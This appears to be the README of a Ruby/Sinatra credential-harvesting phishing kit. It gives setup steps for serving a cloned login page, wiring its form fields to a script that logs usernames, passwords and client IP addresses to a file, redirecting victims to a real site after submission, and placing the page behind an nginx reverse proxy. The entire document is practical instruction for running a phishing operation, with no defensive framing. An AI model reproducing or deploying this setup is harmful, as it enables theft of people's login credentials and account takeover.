A simple, yet highly customizable, script to use with cloned website for phishing and credentials harvesting.
Collected credentials will be stored in credentials.txt file. The credentials.txt is not accessable publicly as there is no route to it, test it.
Stored Data
- Collection time
- Username
- Password
- Remote Client's IP address
Format
YY-MM-DD HH:MM | USERNAME : PASSWORD : CLIENT_IPADD
This script uses Sinatra framework as web application server. I also recommend to use rerun command to run the code as rerun watches the chanes on the file and restart it again, so you don't have to interrupt the service.
gem install sinatra rerun bundle
Put your cloned website under view directory
Find the input id from within the cloned login form you want to use (case sensitive). Example:
<!DOCTYPE html>
<html>
<body>
<h2>HTML Forms</h2>
<form action="/action_page.php">
Username:<br>
<input type="text" id="UserName" name="User">
<br>
Password:<br>
<input type="password" id="Password" name="Pass">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>- Parameter id for user is: UserName
- Parameter id for pass is: Password
- Change the "Action" attributes to be
"/login"as of we have in the login.rb file
Go edit login.rb script and add the parameter ID's
username = params['UserName']
password = params['Password']The Main page
Specify the main page file from within views directory. No need to include views directory as it's already included.
erb 'PATH/TO/LOGIN_PAGE'.to_symRedirect 404
You can redirect the users to the main page if visited not found pages
not_found do
redirect '/'.to_sym
endRedirect after submitting
Also, you can redirect the users once they submit their credentials to the cloned website or other of your choice.
redirect 'https://google.com'Run the script as following
rerun 'ruby login.rb'
Sometime the phishing website is just a small part of many websites on the server.
If you want to run it with nginx, you can make nginx as reverse proxy for the application.
-
Run the script (Step #4)
-
Configure nginx
nano /etc/nginx/sites-available/example.com.conf
Then add the following and restart nginx service.
server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _;
return 301 https://$host$request_uri;
location / {
proxy_pass http://localhost:8181;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
}
}